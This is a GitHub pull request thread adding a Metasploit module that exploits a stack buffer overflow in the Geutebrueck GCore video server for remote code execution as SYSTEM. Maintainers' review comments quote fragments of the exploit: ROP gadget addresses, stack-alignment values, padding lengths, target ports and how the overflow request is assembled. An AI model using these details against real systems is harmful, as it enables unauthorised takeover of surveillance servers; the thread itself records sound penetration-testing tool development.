Add files via upload
rapid7/metasploit-framework pull request #8747
Opened 2017-07-21 06:42 UTC by m4p0

Geutebrueck_GCore_X64_RCE_BO

Metasploit module for Geutebrueck GCore "video management" system. Tested with version 1.3.8.42 and 1.4.2.37.

Full remote code execution with NT/System privileges on Windows (Win 2012R2,Win8.1,...) with the installed Geutebrueck products (GCore).

Authors:

https://www.infoguard.ch
Luca Cappiello
Maurice Popp

![msf_targets](https://user-images.githubusercontent.com/25317633/28451937-84432bde-6df0-11e7-9597-c73af7dacfbc.png)
![msf_showoptions](https://user-images.githubusercontent.com/25317633/28451939-87ede710-6df0-11e7-9a3c-61a1fbd87cdc.png)

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +require 'msf/core'
You don't need to require `msf/core`

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +require 'nokogiri'
You don't need to require `nokogiri`

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                              ['www.geutebrueck.com', '']
Invalid format. Please use:

```ruby
['EBD', '41153'],
['URL', 'https://packetstormsecurity.com/files/140762/geutebrueck-overflow.rb.txt']
```

And add any other references to the advisory, PoC or exploit if available.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                          'Privileged' => false,
If the exploit results in `SYSTEM` then use `'Privileged' => true`

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                          'DisclosureDate' => '2017-01-24',
Invalid date format.

Please run `./tools/dev/msftidy.rb modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb` over the module.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml'))
Is there a reason you're using open-uri rather than the metasploit libraries? The metasploit libraries should be used where possible.

If you change `include Msf::Exploit::Remote::Tcp` to `include Msf::Exploit::Remote::HttpClient`, then you should be able to use `send_request_cgi()` to send HTTP requests.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                    disconnect
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `disconnect` here.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                disconnect
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `disconnect` here.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                connect
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `connect` here.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                    connect
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `connect` here.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                sock.put(exploit, 'Timeout' => 20)
Use `send_request_cgi` instead.

2017-07-21 07:02 UTC, bcoles commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +                    sock.put(exploit, 'Timeout' => 20)
Use `send_request_cgi` instead.

2017-09-14 14:21 UTC, h00die commented
@m4p0 Its been a month and a half, @bcoles had a bunch of good suggestions to standardize this code which shouldn't take much time at all to implement.  Is this still on your to do list?

2017-09-25 12:49 UTC, m4p0 reviewed
The changes were implemented. Except the implementation of the Msf::Exploit::Remote::HttpClient due the special crafted request.

2017-09-30 19:44 UTC, h00die commented
@bcoles do you want me to take this over now?  @m4p0 can you write up some module documentation which is now a requirement?  See #8781 or any of the [templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md).  One of the important things in the docs is the links to the vuln software (if possible)

2017-10-06 10:33 UTC, h00die commented
@m4p0 any status on the documentation?

2017-10-06 11:01 UTC, m4p0 commented
@h00die I'll take care of the documentation. I can't provide a vulnerable application.

2017-10-06 11:07 UTC, h00die commented
would you be able to supply a pcap of exploitation (feel free to sanitize)?
Also, it looks like you did 4 space (like python), ruby is 2 space indentation.

If you can get docs, a pcap, and 2 space, i should be able to look at it in the next few days and hopefully get this landed!

2017-10-06 13:43 UTC, m4p0 commented
@h00die I'm checking if I can give a link to an application or a pcap. But I will add this as soon as possible.

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +    end
You can set the default port to avoid needing to set it at exploitation time.  See https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb#L33

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...')
Change to:
```print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")```

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml'))
```"http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"```

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.')
Change to:
```print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")```

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      print_status("Make sure that you know the exact version, otherwise you'll knock out the service.")
change " to '

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        # 0x...40        | Value for VP "Execute Permissions"
Just wanted to say that I appreciate all the comments you've put in here explaining each thing.  Very nice!

2017-10-06 14:32 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      if target['auto']
unless im not looking close enough it looks there is minimal difference between auto and target selected areas of code here.  It looks like if its auto, you check and then handle if its not vuln.  From that point on, looks to be no changes, so we can most likely shorten up the code by bombing out on unknown.
I think this could really be something like (pseudo code)
```
if target['auto']
       checkcode, self.target = fingerprint
       fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
end
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
[throw exploit with rescue and ensure areas]
```

2017-10-07 12:09 UTC, m4p0 commented
I think I was able to shorten the code. Thanks you @h00die.  I think we have to startup the whole testing environment to verify that the code is still running as expected.

2017-10-07 16:25 UTC, h00die commented
If you're able to get a PCAP send it to msfdev@metasploit.com  and we'll review it, match it to the code, and land this thing

2017-10-21 00:15 UTC, h00die commented
@m4p0 just wanted to check in on this PR

2017-10-22 09:53 UTC, m4p0 commented
@h00die as heads-up we're on it. We will deliver the rest like the pcap and tests for the working code during the next week.

2017-10-23 07:31 UTC, m4p0 commented
@h00die as told yesterday the code fix were made and tested. PCAP was delivered by now. 
Thanks for your help!

2017-10-26 01:20 UTC, h00die requested changes

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +      'Description'	=> 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authenti
Can you multiline this.  See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/altn_webadmin.rb#L14 as an example (or pretty much every module)

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        ['URL','www.geutebrueck.com']
Maybe add: `['CVE', '2017-11517']`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}],
You can remove the () parts, or just do (Win7+)

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}]
You can remove the () parts, or just do (Win7+)

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +        [
you can shorten this to `[Opt::RPORT(13003)]`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align = "\x43" * 16
This line is the same in both, it could be moved to before the `if` statement.

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x1404e5cbf].pack('Q<')
for string concat, ruby prefers `<<` to `+=`.  See https://stackoverflow.com/questions/4684446/why-is-the-shovel-operator-preferred-over-plus-equals-when-building-a

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x14013db94].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x1407dc547].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x140ce9ac0].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140cc2234].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1400ae2ae].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x0000000000000400].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x0000000000000040].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x14029dc6e].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1409AE1A8].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1400aa030].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140b5927a].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1402ce220].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140d752b8].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1407c6b3b].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140989c41].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1406d684d].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x1404f213f].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x14000efa8].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x140cdfe65].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            stack_align += [0x140cf3110].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140cfb98d].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140166c46].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x14095b254].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140d83268].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x14000efa8].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140ccea2f].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140FB5000].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x1400aa030].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x0000000000000040].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140a88f81].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x0000000000000400].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x14008f7ec].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop += [0x140ccb984].pack('Q<')
`+=` to `<<`

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            rop = ''
This line is the same in both, it could be moved to before the `if` statement.

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
Instead of these single use variables here, could we simplify:
```
exploit = 'GET /'
exploit << "\x41" * 200
exploit << target_rop
exploit << payload.encoded
exploit << "\x41" * 1823
exploit << target_overwrite
exploit << target_stack_align
```
I'm also assuming you couldn't use the `send_request_cgi` ?  I didn't go back through all the comments, figured it was discussed there and just wanted to make sure it was.

2017-10-26 01:20 UTC, h00die commented on modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
> +            elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
I would add a fail_with here as well.

2017-10-26 01:22 UTC, h00die commented
I checked over the pcap, looks good.  One last pass through the code some things were bothering me stylistically.  Once those changes are done, i'll land since the functionality is good.

2017-11-07 19:02 UTC, m4p0 reviewed
All changes were adopted.

2017-11-07 21:09 UTC, h00die approved these changes

2017-11-07 21:10 UTC, h00die commented
looks good, i'm going to give it one last run through tonight to make sure nothing functionally changed (doesn't look to be) and then give this a merge.
thanks for hanging with this module and making all the changes!

2017-11-08 08:56 UTC, m4p0 commented
Thanks for your support and patience. I'll def. open a beer when this module is part of metasploit.

2017-11-09 01:21 UTC, h00die commented
go get that beer.

2017-11-09 01:24 UTC, merged

2017-11-09 01:25 UTC, h00die commented
# Release Notes
This module adds an RCE against Geutebrueck GCore

2017-11-09 01:26 UTC, h00die commented
Thanks again for sticking with this, it took a while, so I (we) appreciate all the work!

2017-11-09 01:27 UTC, busterb commented
\o/

2017-11-09 01:34 UTC, h00die commented
I had a ninja edit, your spacing was off.  https://github.com/rapid7/metasploit-framework/commit/7ad151e68bf9a30d37d9c745175b7873279d4ab4